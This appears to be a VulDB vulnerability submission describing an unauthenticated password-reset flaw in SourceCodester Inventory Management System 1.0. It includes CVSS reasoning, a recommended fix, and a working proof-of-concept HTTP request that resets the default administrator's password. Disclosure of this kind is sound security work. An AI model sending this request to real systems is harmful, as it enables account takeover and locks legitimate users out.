| 제목 | Pre-Authentication Admin Account Takeover in Inventory Management System 1.0 |
|---|
| 설명 | ## Summary
The password reset feature in SourceCodester Inventory Management System 1.0 does not properly validate user authorization during password reset. This allows any unauthorized user to reset passwords of arbitrary users.
## Issue Description
A remote attacker can send a POST request to the edit_update.php endpoint. This attack requires knowledge of the username of the user for login. By changing the user_id parameter, the attacker can change the password of an arbitrary account.
Knowledge of the ID is prefered, but can easily be bruteforced by iterating up from 1 until an error is returned.
## Affected URL/Area
<host>/ample/app/action/edit_update.php
## Risk Rating
- Risk: **HIGH**
- Exploitation Difficulty: **LOW**
## CVSS Justification
### Network
The vulnerable component is bound to the network stack. The set of possible attackers extends beyond local attacks, up to and including the entire Internet. This kind of vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).
### Low
Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.
### None
The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the the vulnerable system to carry out an attack.
### None
The vulnerable system can be exploited without interaction from any user.
### Changed
An exploited vulnerability can affect resources beyond the security scope managed by the security authority of the vulnerable component.
### None
There is no loss of confidentiality within the impacted component.
### Low
Modification of data is possible, but the negative security effects of the modification is limited. Only the account passwords are changed, no other data.
### High
There is a total loss of availability. All users are effectively locked out of their accounts.
## Steps to reproduce
Verify that the user with ID=1 has username "[email protected]", this is default. You can change this if you so choose.
Request
```
POST /ample/app/action/edit_update.php HTTP/1.1
Host: <HOST HERE>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 45
user_id=1&password=hacked!&c_password=hacked!
```
Login at /ample/login.php with the credentials:
```
[email protected]:hacked!
```
You are now logged in as the default administrator. This login will not work if this account has been deleted or the username has changed.
## Affected Demographic/User Base
Any users of this service for inventory management are locked out of their accounts. If the account administrator has a predictable username, then the entire service could be compromised.
## Recommended Fix
Add RBAC checks to all php actions. Do not let users reset the passwords of other users without highly protected administrator permissions.
## References
### Authorization
https://cwe.mitre.org/data/definitions/284.html
https://cwe.mitre.org/data/definitions/285.html
https://martellosecurity.com/kb/mitre/cwe/285/
https://docs.guardrails.io/docs/vulnerability-classes/insecure-authentication/improper-authentication
https://www.invicti.com/blog/web-security/how-to-avoid-authentication-and-authorization-vulnerabilities/
## Notes
For the issued CVE ID, please credit Michael Blunt as the discovering researcher.
List contact email as [email protected].
## Impact
### Attack Scenario
An attacker could use this to reset the password of a valid administrator account. The attacker could then log in normally and use all tools as an administrator. |
|---|
| 사용자 | mikel22 (UID 51822) |
|---|
| 제출 | 2023. 07. 31. PM 04:35 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 08. 05. PM 06:45 (5 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 236218 [SourceCodester Inventory Management System 1.0 Password edit_update.php user_id 권한 상승] |
|---|
| 포인트들 | 17 |
|---|